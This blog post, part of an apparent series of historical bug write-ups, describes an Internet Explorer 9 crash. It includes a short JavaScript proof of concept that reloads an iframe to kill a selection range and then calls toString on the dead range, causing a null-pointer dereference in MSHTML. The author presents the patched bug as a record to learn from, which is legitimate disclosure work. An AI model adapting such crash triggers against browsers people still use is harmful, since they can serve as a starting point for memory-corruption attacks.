IE9 Crash (Deadcall): toString on a Dead Selection Range

A deadcall crash involving selection ranges: obtaining a range from an IFrame’s selection, reloading the IFrame to destroy the range’s context, and calling toString() from a live range on behalf of the dead one caused a crash in MSHTML!CTreeSaver::CTreeSaver.

iFrame.document.body.focus();
iFrame.document.execCommand("SelectAll");
var badRange = iFrame.getSelection().getRangeAt(0);

document.body.focus();
document.execCommand("SelectAll");
var goodRange = getSelection().getRangeAt(0);

iFrame.location.reload();

setTimeout(function() {
    goodRange.toString.call(badRange); // Crash
});

This was filed with the related bug WOOBR #1112476. The toString call attempted to serialize the range’s content, which involved walking the backing markup tree. With the markup freed by the reload, the tree saver tried to dereference a null markup pointer in its constructor, causing the access violation.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE9 Information Disclosure (Deadcall): Reading IFrame Location via toString] :: [IE9 Crash (Deadcall): cloneRange on a Dead Range] >